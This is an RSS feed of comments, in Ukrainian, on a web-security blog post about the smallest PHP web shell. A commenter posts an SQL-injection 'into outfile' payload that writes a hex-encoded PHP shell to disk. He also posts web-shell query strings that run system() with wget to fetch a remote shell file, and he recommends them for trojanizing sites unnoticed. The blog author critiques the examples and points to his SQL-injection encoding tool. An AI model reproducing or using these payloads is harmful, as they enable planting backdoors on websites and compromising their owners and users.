<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/MustLive Edition" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
	<title>Коментарі для запису: Самий маленький PHP-шел</title>
	<link>http://websecurity.com.ua/3344/</link>
	<description></description>
	<pubDate>Sun, 19 Apr 2026 18:46:14 +0000</pubDate>
	<generator>http://wordpress.org/?v=MustLive Edition</generator>

	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3344/#comment-299448</link>
		<pubDate>Fri, 24 Jul 2009 19:01:08 +0000</pubDate>
		<guid>http://websecurity.com.ua/3344/#comment-299448</guid>
					<description>&lt;blockquote&gt;ну якшо бути чесним, то не я його придумав&lt;/blockquote&gt;
Я так і здогадувався, що цей шел придумали до тебе і ти повідомив про вже існуючий шел. Просто треба було в тексті його якось назвати :-).

&lt;blockquote&gt;незнаю чого ти не опублікував hex цого шеллу, який пригодиться при magic_quotes On:
&gt;&gt; select 0?3c3f3d40602463603f3e into outfile ‘/tmp/s.php’;&lt;/blockquote&gt;
Ну, кому треба зробити hex-версію шела, той зробить це самотужки, не варто лінитися ;-). До того ж, окрім використання хекса, при SQL Injection атаках для обходу magic_quotes можна використовувати мій &lt;a href="http://websecurity.com.ua/sqli_ascii_encoder/" rel="nofollow"&gt;SQL Injection ASCII Encoder&lt;/a&gt;.

А от стосовно приклада з into outfile, то він дуже невдалий. Ти завжди добре подумай перед тим як привести приклад і завжди перечитуй текст перед його публікаціює - це дозволить уникнути таких ляпів. Бо приклад неробочий (знов тебе понесло на "неробочі дірки", як з тою діркою в плагіні до WP).

Для запису в файл через into outfile потрібні лапки, тому з включеними magic_quotes цього зробити не вдасться. Тому й не вдасться записати шел у файл через SQL Injection і тому даний приклад шела в хексі є неактуальним, бо обійшовши таким чином mq для текста шела, їх не вдасться обійти в імені файла (і по цій причині SQL запит не виконається). Зовсім не подумавши ти це приклад написав ;-).

&lt;blockquote&gt;завжди є альтернатива, тому аналог від Електа - “сліпий” шелл:
...
а ше один аналог в 9байт від того самого Електа ;) :&lt;/blockquote&gt;
Ти ці два шела перезапость в коментарі з врахуванням моїх рекомендацій по використанню html-entities кутових дужок.</description>
		<content:encoded><![CDATA[<blockquote><p>ну якшо бути чесним, то не я його придумав</p></blockquote>
<p>Я так і здогадувався, що цей шел придумали до тебе і ти повідомив про вже існуючий шел. Просто треба було в тексті його якось назвати <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> .</p>
<blockquote><p>незнаю чого ти не опублікував hex цого шеллу, який пригодиться при magic_quotes On:<br />
>> select 0?3c3f3d40602463603f3e into outfile ‘/tmp/s.php’;</p></blockquote>
<p>Ну, кому треба зробити hex-версію шела, той зробить це самотужки, не варто лінитися <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> . До того ж, окрім використання хекса, при SQL Injection атаках для обходу magic_quotes можна використовувати мій <a href="http://websecurity.com.ua/sqli_ascii_encoder/" rel="nofollow">SQL Injection ASCII Encoder</a>.</p>
<p>А от стосовно приклада з into outfile, то він дуже невдалий. Ти завжди добре подумай перед тим як привести приклад і завжди перечитуй текст перед його публікаціює - це дозволить уникнути таких ляпів. Бо приклад неробочий (знов тебе понесло на &#8220;неробочі дірки&#8221;, як з тою діркою в плагіні до WP).</p>
<p>Для запису в файл через into outfile потрібні лапки, тому з включеними magic_quotes цього зробити не вдасться. Тому й не вдасться записати шел у файл через SQL Injection і тому даний приклад шела в хексі є неактуальним, бо обійшовши таким чином mq для текста шела, їх не вдасться обійти в імені файла (і по цій причині SQL запит не виконається). Зовсім не подумавши ти це приклад написав <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> .</p>
<blockquote><p>завжди є альтернатива, тому аналог від Електа - “сліпий” шелл:<br />
&#8230;<br />
а ше один аналог в 9байт від того самого Електа <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  :</p></blockquote>
<p>Ти ці два шела перезапость в коментарі з врахуванням моїх рекомендацій по використанню html-entities кутових дужок.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3344/#comment-299446</link>
		<pubDate>Fri, 24 Jul 2009 18:33:05 +0000</pubDate>
		<guid>http://websecurity.com.ua/3344/#comment-299446</guid>
					<description>&lt;blockquote&gt;водрпрес знову обрізав теги, і це шо потрібно, тому ше раз:&lt;/blockquote&gt;
WordPress не знову їх обрізав, а він завжди обрізає теги :-). Є лише базовий набір тегів, які WP дозволяє в коментах.

&lt;blockquote&gt;“сліпий” шелл від Електа:&lt;/blockquote&gt;
poma, в твоєму випадку потрібно вводити кутові дужки через їх html-entities:

&#38;gt; - &#62;
&#38;lt; - &#60;

І тоді зможеш ввести потрібний php код.</description>
		<content:encoded><![CDATA[<blockquote><p>водрпрес знову обрізав теги, і це шо потрібно, тому ше раз:</p></blockquote>
<p>WordPress не знову їх обрізав, а він завжди обрізає теги <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> . Є лише базовий набір тегів, які WP дозволяє в коментах.</p>
<blockquote><p>“сліпий” шелл від Електа:</p></blockquote>
<p>poma, в твоєму випадку потрібно вводити кутові дужки через їх html-entities:</p>
<p>&amp;gt; - &gt;<br />
&amp;lt; - &lt;</p>
<p>І тоді зможеш ввести потрібний php код.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: poma</title>
		<link>http://websecurity.com.ua/3344/#comment-299311</link>
		<pubDate>Wed, 22 Jul 2009 06:47:40 +0000</pubDate>
		<guid>http://websecurity.com.ua/3344/#comment-299311</guid>
					<description>та шо ж таке!
водрпрес знову обрізав теги, і це шо потрібно, тому ше раз:

"сліпий" шелл від Електа:
&#62;&#62; &#62; </description>
		<content:encoded><![CDATA[<p>та шо ж таке!<br />
водрпрес знову обрізав теги, і це шо потрібно, тому ше раз:</p>
<p>&#8220;сліпий&#8221; шелл від Електа:<br />
&gt;&gt; &gt;
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: poma</title>
		<link>http://websecurity.com.ua/3344/#comment-299310</link>
		<pubDate>Wed, 22 Jul 2009 06:46:45 +0000</pubDate>
		<guid>http://websecurity.com.ua/3344/#comment-299310</guid>
					<description>водрпрес обрізав теги, тому ше раз:

"сліпий" шелл від Електа:
&#62;&#62; &#62; </description>
		<content:encoded><![CDATA[<p>водрпрес обрізав теги, тому ше раз:</p>
<p>&#8220;сліпий&#8221; шелл від Електа:<br />
&gt;&gt; &gt;
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: poma</title>
		<link>http://websecurity.com.ua/3344/#comment-299309</link>
		<pubDate>Wed, 22 Jul 2009 06:44:38 +0000</pubDate>
		<guid>http://websecurity.com.ua/3344/#comment-299309</guid>
					<description>&#62;&#62; Poma’s Shell
омг 8O ну якшо бути чесним, то не я його придумав  :roll: ;)

незнаю чого ти не опублікував hex цого шеллу, який пригодиться при magic_quotes On:
&#62;&#62; select 0x3c3f3d40602463603f3e into outfile '/tmp/s.php';

і такий шелл, я так думаю, для залиття не варто використовувати, бо можна зайвий раз "спалитися" ;)

такий шелл потрібно використовувати при протроянювання сайтів, коли хочете залишити "незамітний" слід..

і ше до цого всього:
завжди є альтернатива, тому аналог від Електа - "сліпий" шелл:
&#62;&#62; &#62; ?a=system('wget http://site.com/shell.txt');

а ше один аналог в 9байт від того самого Електа ;) :
&#62;&#62; &#62; ?a=system&#38;b=wget%20http://site.com//shell.txt</description>
		<content:encoded><![CDATA[<p>&gt;&gt; Poma’s Shell<br />
омг <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_eek.gif' alt='8O' class='wp-smiley' />  ну якшо бути чесним, то не я його придумав   <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_rolleyes.gif' alt=':roll:' class='wp-smiley' />  <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>незнаю чого ти не опублікував hex цого шеллу, який пригодиться при magic_quotes On:<br />
&gt;&gt; select 0&#215;3c3f3d40602463603f3e into outfile &#8216;/tmp/s.php&#8217;;</p>
<p>і такий шелл, я так думаю, для залиття не варто використовувати, бо можна зайвий раз &#8220;спалитися&#8221; <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>такий шелл потрібно використовувати при протроянювання сайтів, коли хочете залишити &#8220;незамітний&#8221; слід..</p>
<p>і ше до цого всього:<br />
завжди є альтернатива, тому аналог від Електа - &#8220;сліпий&#8221; шелл:<br />
&gt;&gt; &gt; ?a=system(&#8217;wget <a href="http://site.com/shell.txt&#8217;" rel="nofollow">http://site.com/shell.txt&#8217;</a>);</p>
<p>а ше один аналог в 9байт від того самого Електа <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  :<br />
&gt;&gt; &gt; ?a=system&amp;b=wget%20http://site.com//shell.txt
</p>
]]></content:encoded>
				</item>
</channel>
</rss>
